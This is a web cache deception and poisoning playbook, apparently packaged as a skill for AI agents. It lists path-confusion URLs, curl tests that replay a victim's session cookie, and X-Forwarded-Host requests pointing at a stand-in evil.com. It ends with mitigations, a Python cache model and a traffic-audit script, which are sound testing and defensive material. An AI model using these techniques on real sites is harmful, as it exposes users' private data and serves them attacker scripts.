Web cache deception and poisoning playbook. Use when CDN, reverse proxy, or application caching may serve sensitive authenticated content to other users due to path confusion or cache key manipulation.
```sh
npx skill4agent add yaklang/hack-skills web-cache-deception
```

AI LOAD INSTRUCTION: Web cache deception and poisoning techniques. Covers path confusion attacks, CDN cache behavior exploitation, cache key manipulation, and the distinction between cache deception (stealing data) and cache poisoning (serving malicious content). Presented by Omer Gil at Black Hat 2017 and significantly expanded since.
Cache deception flow:

```text
Victim visits: https://target.com/account/profile/nonexistent.css
→ Application ignores "nonexistent.css", serves /account/profile (with auth data)
→ CDN sees .css extension → caches the response
→ Attacker fetches: https://target.com/account/profile/nonexistent.css
→ CDN serves cached authenticated content → attacker reads victim's data
```

Cache poisoning flow:

```text
GET /page HTTP/1.1
Host: target.com
X-Forwarded-Host: evil.com

→ Application generates: <script src="https://evil.com/js/app.js">
→ Cache stores this response
→ Normal users hit cache → load attacker's JavaScript
```

Extensions commonly treated as cacheable static assets:

```text
.css .js .jpg .png .gif .svg .ico
.woff .woff2 .ttf .pdf .json (sometimes)
```

Path confusion URL patterns:

```text
# Append static extension to authenticated endpoint:
https://target.com/api/me/info.css
https://target.com/account/profile/x.js
https://target.com/settings/avatar.png
https://target.com/dashboard/data.json
# Path traversal style:
https://target.com/account/profile/..%2fstatic/app.css
```

Verifying that the cache served authenticated content:

```sh
# Request as victim (authenticated):
curl -H "Cookie: session=VICTIM" https://target.com/account/profile/x.css
# Check response headers:
# X-Cache: MISS (first request)
# Age: 0
# Request again as attacker (no auth):
curl https://target.com/account/profile/x.css
# Check response:
# X-Cache: HIT
# Contains victim's authenticated content? → vulnerable
```

Example deception URL: `https://target.com/account/profile/tracking.gif`

Headers involved: `Host` (normally part of the cache key) versus the usually unkeyed `X-Forwarded-Host`, `X-Forwarded-Scheme` and `X-Original-URL`.

```sh
# Test if X-Forwarded-Host is reflected but not keyed:
curl -H "X-Forwarded-Host: evil.com" https://target.com/page
# If response contains evil.com and caches → poisonable
```

Unkeyed headers to test:

```text
X-Forwarded-Host X-Forwarded-Scheme X-Forwarded-Proto
X-Original-URL X-Rewrite-URL X-Host
X-Forwarded-Server Forwarded True-Client-IP
```

Poisoning example:

```text
GET / HTTP/1.1
Host: target.com
X-Forwarded-Host: evil.com

→ Response: <link href="//evil.com/static/main.css">
→ Cached → all users load attacker's CSS/JS
```

Why the layers disagree:

| Component | Behavior |
|---|---|
| CDN (Cloudflare, Akamai) | Caches based on full URL path including extension |
| Application (Rails, Django, Express) | May ignore trailing path segments or extensions |
| Reverse proxy (Nginx) | May strip or rewrite path before forwarding |
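The table above and the two flows it explains (a junk suffix that the application ignores but the CDN keys on, and an unkeyed `X-Forwarded-Host` baked into a cached page) are easiest to reason about with a small cache model. The following Python is an added illustration, not code from the hack-skills project: it puts a lax origin and a hardened one behind a toy CDN keyed only on `Host` and path, so the same two request sequences can be replayed against each. The hosts, cookie value and the `TRUSTED_HOSTS` allowlist are constructed.

```python
"""Toy model of the CDN/origin mismatch behind web cache deception and
unkeyed-header cache poisoning.  Added illustration, not the hack-skills
project's code; hosts, paths and cookie values are constructed."""
from dataclasses import dataclass, field

STATIC_EXT = (".css", ".js", ".png", ".gif", ".woff2")
TRUSTED_HOSTS = {"target.com"}  # constructed allowlist for absolute-URL generation


@dataclass
class Request:
    path: str
    headers: dict  # e.g. Host, Cookie, X-Forwarded-Host


@dataclass
class Response:
    body: str
    headers: dict = field(default_factory=dict)
    status: int = 200


def lax_origin(req):
    """Vulnerable origin: anything under /account/profile serves the profile,
    no Cache-Control is sent, and absolute URLs trust X-Forwarded-Host."""
    host = req.headers.get("X-Forwarded-Host", req.headers["Host"])
    if req.path.startswith("/account/profile"):
        return Response(f"profile for {req.headers.get('Cookie', 'anonymous')}")
    return Response(f'<script src="https://{host}/js/app.js"></script>')


def strict_origin(req):
    """Hardened origin: exact route match, no-store/private on authenticated
    data, 404 for junk suffixes, forwarded host honoured only if allowlisted."""
    host = req.headers["Host"]
    if req.headers.get("X-Forwarded-Host") in TRUSTED_HOSTS:
        host = req.headers["X-Forwarded-Host"]
    if req.path == "/account/profile":
        return Response(f"profile for {req.headers.get('Cookie', 'anonymous')}",
                        {"Cache-Control": "no-store, private", "Vary": "Cookie"})
    if req.path.startswith("/account/profile/"):
        # Some CDNs cache 404s too, so the no-store header does the real work.
        return Response("not found", {"Cache-Control": "no-store"}, status=404)
    return Response(f'<script src="https://{host}/js/app.js"></script>')


class Cdn:
    """Cache keyed on (Host, path) only: X-Forwarded-Host and Cookie are unkeyed.
    A response is stored when it lacks no-store/private and either the path
    looks like a static asset or the request carried no Cookie."""

    def __init__(self, origin):
        self.origin = origin
        self.store = {}

    def fetch(self, req):
        key = (req.headers["Host"], req.path)
        if key in self.store:
            return self.store[key], "HIT"
        resp = self.origin(req)
        cc = resp.headers.get("Cache-Control", "")
        looks_static = req.path.lower().endswith(STATIC_EXT)
        if "no-store" not in cc and "private" not in cc and (
                looks_static or "Cookie" not in req.headers):
            self.store[key] = resp
        return resp, "MISS"


def deception_demo(origin):
    """Victim loads /account/profile/x.css; an unauthenticated client then asks
    for the same URL.  Returns (cache state, body) seen by the second client."""
    cdn = Cdn(origin)
    cdn.fetch(Request("/account/profile/x.css",
                      {"Host": "target.com", "Cookie": "session=VICTIM"}))
    resp, state = cdn.fetch(Request("/account/profile/x.css", {"Host": "target.com"}))
    return state, resp.body


def poisoning_demo(origin):
    """One request carries X-Forwarded-Host: evil.com; a plain request follows.
    Returns (cache state, whether evil.com reached the second client)."""
    cdn = Cdn(origin)
    cdn.fetch(Request("/page", {"Host": "target.com", "X-Forwarded-Host": "evil.com"}))
    resp, state = cdn.fetch(Request("/page", {"Host": "target.com"}))
    return state, "evil.com" in resp.body


if __name__ == "__main__":
    for origin in (lax_origin, strict_origin):
        print(origin.__name__, deception_demo(origin), poisoning_demo(origin))
```

Against `lax_origin` the second client gets a `HIT` carrying the victim's profile, and the plain `/page` request gets a `HIT` that references `evil.com`. Against `strict_origin` the junk-suffix request is a `MISS` returning `not found`, and `/page` is still cached (caching itself is fine) but never contained `evil.com`, because the origin ignored the untrusted forwarded host. The toy emits `Vary: Cookie` on the hardened profile response but does not key on it; a real cache would.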
The same path resolved two ways:

```text
# Application treats these as equivalent:
/account/profile
/account/profile/anything
/account/profile/x.css
/account/profile;.css
# CDN treats .css as cacheable static asset
→ Mismatch = vulnerability
```

Header reflection into generated markup:

```text
# Target page uses X-Forwarded-Host to generate meta tags:
GET / HTTP/1.1
Host: target.com
X-Forwarded-Host: evil.com

# Response:
<meta property="og:image" content="https://evil.com/assets/logo.png">
# or:
<link rel="canonical" href="https://evil.com/">

# If response is cached → all users see evil.com references
# Impact: XSS via injected JS path, phishing via canonical redirect, SEO hijack
```

Path separator variants:

```text
# Semicolon (treated as path parameter by some frameworks):
/account/profile;.css
# Encoded separators:
/account/profile%2F.css
# Trailing dot/space:
/account/profile/.css
/account/profile .css
```

Mitigations:

- Restrict cache rules to genuinely static paths such as `/static/*` and `/assets/*`.
- Send `Cache-Control: no-store, private` on every authenticated response.
- Send `Vary: Cookie` so that any cached variant is keyed on the session.
- Do not trust client-supplied `X-Forwarded-*` headers when generating URLs; strip them at the edge.
- `Cache-Control: no-cache` on its own only forces revalidation; it does not prevent storage, so it is not a substitute for `no-store`.

Testing checklist:

□ Identify CDN/cache layer (X-Cache, Age, Via headers)
□ Append .css/.js/.png to authenticated API endpoints
□ Check if response is cached (X-Cache: HIT on second request)
□ Test path separators: /x.css, ;.css, %2F.css
□ Test unkeyed headers: X-Forwarded-Host, X-Original-URL
□ Verify Cache-Control headers on sensitive endpoints
□ Check Vary header presence
□ Test with and without authentication
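To make the checklist repeatable over captured traffic (for example a proxy export of request/response pairs), here is an added Python audit helper; it is not part of the hack-skills project. It applies the checks above to each record: missing `no-store`/`private` and `Vary: Cookie` on authenticated responses, static-looking suffixes on authenticated paths, `X-Cache`/`Age` evidence that a shared cache answered, and any of the page's unkeyed headers reflected into the body without appearing in `Vary`. The sample records and the `AUTH_PREFIXES` list (taken from the example endpoints above) are constructed.

```python
"""Audit helper for the testing checklist above: flags captured
request/response pairs that show cache-deception or header-poisoning risk.
Added example, not the hack-skills project's tooling; the sample records and
AUTH_PREFIXES are constructed."""
import re

STATIC_RE = re.compile(r"\.(css|js|jpe?g|png|gif|svg|ico|woff2?|ttf|pdf|json)$", re.I)
AUTH_PREFIXES = ("/account", "/api/me", "/settings", "/dashboard")  # constructed
UNKEYED = ("x-forwarded-host", "x-forwarded-scheme", "x-forwarded-proto",
           "x-original-url", "x-rewrite-url", "x-host", "x-forwarded-server",
           "forwarded", "true-client-ip")


def audit(record):
    """record = {"path", "req": request headers, "resp": response headers, "body"}.
    Returns a list of findings; an empty list means nothing looked wrong."""
    path = record["path"].split("?", 1)[0]
    req = {k.lower(): v for k, v in record["req"].items()}
    resp = {k.lower(): v for k, v in record["resp"].items()}
    body = record.get("body", "").lower()
    cc = resp.get("cache-control", "").lower()
    vary = {v.strip().lower() for v in resp.get("vary", "").split(",")}

    authed = "cookie" in req and path.startswith(AUTH_PREFIXES)
    protected = "no-store" in cc or "private" in cc
    # X-Cache: HIT or a non-zero Age both mean a shared cache answered.
    served_from_cache = (resp.get("x-cache", "").upper().startswith("HIT")
                         or resp.get("age", "0").strip() != "0")

    findings = []
    if authed and not protected:
        findings.append("authenticated response lacks Cache-Control: no-store/private")
        if "cookie" not in vary:
            findings.append("authenticated response has no Vary: Cookie")
    if authed and STATIC_RE.search(path):
        findings.append("static-looking suffix on authenticated path (path confusion)")
    if authed and served_from_cache:
        findings.append("authenticated response was served from cache (X-Cache/Age)")
    for header in UNKEYED:
        value = req.get(header, "")
        if value and value.lower() in body and header not in vary:
            findings.append(f"{header} reflected in body but absent from Vary (poisoning risk)")
    return findings


def audit_all(records):
    """Map each record's path to its findings."""
    return {r["path"]: audit(r) for r in records}


SAMPLES = [  # constructed captures, one per scenario on the page
    {"path": "/account/profile/x.css",
     "req": {"Host": "target.com", "Cookie": "session=VICTIM"},
     "resp": {"X-Cache": "HIT", "Age": "37", "Cache-Control": "public, max-age=3600"},
     "body": "<h1>Profile: victim@example.com</h1>"},
    {"path": "/page",
     "req": {"Host": "target.com", "X-Forwarded-Host": "evil.com"},
     "resp": {"X-Cache": "MISS", "Age": "0"},
     "body": '<script src="https://evil.com/js/app.js"></script>'},
    {"path": "/account/profile",
     "req": {"Host": "target.com", "Cookie": "session=VICTIM"},
     "resp": {"X-Cache": "MISS", "Cache-Control": "no-store, private", "Vary": "Cookie"},
     "body": "<h1>Profile</h1>"},
    {"path": "/static/app.css",
     "req": {"Host": "target.com"},
     "resp": {"X-Cache": "HIT", "Age": "900", "Cache-Control": "public, max-age=86400"},
     "body": "body{}"},
]


if __name__ == "__main__":
    for path, findings in audit_all(SAMPLES).items():
        print(path, "->", findings or "ok")
```

The first sample trips all four deception checks, the second is flagged only for the reflected `X-Forwarded-Host`, and the last two (a properly protected profile and a genuinely static asset) produce nothing. Feed it real captures by building the same dict shape from your proxy's export; the `body` match is a plain substring test, so a reflected value that was URL- or HTML-encoded on the way out will need a decoding step first.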